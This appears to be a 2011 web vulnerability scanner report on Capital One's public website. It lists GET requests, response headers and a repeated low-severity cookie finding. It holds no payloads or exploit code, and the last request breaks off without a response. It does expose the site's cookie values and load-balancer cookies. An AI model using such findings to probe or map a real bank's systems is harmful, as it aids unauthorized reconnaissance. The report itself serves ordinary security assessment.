GET /autoloans/lp/auto-loans-pict.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:23 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:23 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:22 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 12533
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Save time and m ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /autoloans/refinance/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:27 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D8%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:27 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesb=c_m%3D3; expires=Thu, 02-Feb-2012 22:12:27 GMT; path=/; domain=.capitalone.com Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:27 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:26 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 24471
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bank/commercial/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:20 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D3; expires=Thu, 02-Feb-2012 22:12:20 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 41880
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><HTML><HEAD><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Comme ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bank/homeloansandmortgages/home-loan-assistance/legacy-ccb/index.php?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_C8_01_T_HLMAINFOCCB HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:22 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D1; expires=Thu, 02-Feb-2012 22:12:22 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 17136
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Home ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /capitaloneplace/disclosures.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:43 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D4; expires=Thu, 02-Feb-2012 22:12:43 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 22852
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Im ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /careers/?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_GBLFO_F1_03_T_C1 HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:40 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D4; expires=Thu, 02-Feb-2012 22:12:40 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 35950
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>The l ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking-accounts/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:02 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:01 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 23738
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /contactus/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:28 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:27 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 28007
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Contact Capital O ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /contactus/faq.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:32 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:32 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 21007
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Capital One Frequ ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /contactus/olbsupport.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:34 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:34 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 25849
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Onlin ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /creditcards/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:51 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=test; path=/creditcards/; domain=www.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 31333
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /creditcards/products/browse-all/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:52 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D7%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=test; path=/creditcards/; domain=www.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 66271
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /creditcards/products/browse-all/popular/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:51 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D7%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=test; path=/creditcards/; domain=www.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 66647
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /directbanking/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:19 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D9%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:19 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:20 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:19 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 37763
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /directbanking/online-certificates-deposit/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:13 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:12 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:13 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:12 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 31412
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /directbanking/online-checking-accounts/interest-online-checking-account/?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_C7_03_T_SP30&itc=CAPITALONE1112G1INTMKTGDF&number=HSRLutmi4O6tZPn79JErD HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
